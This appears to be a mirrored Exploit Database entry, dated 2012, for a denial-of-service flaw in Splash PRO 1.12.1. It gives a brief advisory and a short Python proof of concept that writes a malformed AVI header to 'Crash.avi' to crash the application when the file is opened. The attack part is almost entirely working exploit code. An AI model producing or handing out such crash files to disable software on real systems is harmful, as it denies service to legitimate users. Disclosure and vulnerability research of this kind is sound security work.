Splash PRO 1.12.1 – ‘.avi’ File Denial of Service

• Exploit Database
• 113 阅读

• 作者： Senator of Pirates
  日期： 2012-03-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36896/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

  source: https://www.securityfocus.com/bid/52273/info   Splash PRO is prone to a denial-of-service vulnerability.   Attackers can exploit this issue to crash the affected application, denying service to legitimate users.   Splash PRO 1.12.1 is vulnerable; other versions may also be affected.   PoC = "\x52\x49\x46\x46\x3c\xad\x08\x00\x41\x56\x49\x20\x4c\x49\x53\x54" PoC +="\x72\x22\x00\x00\x68\x64\x72\x6c" payload = (PoC) f = open("Crash.avi","wb") f.write(payload) f.close()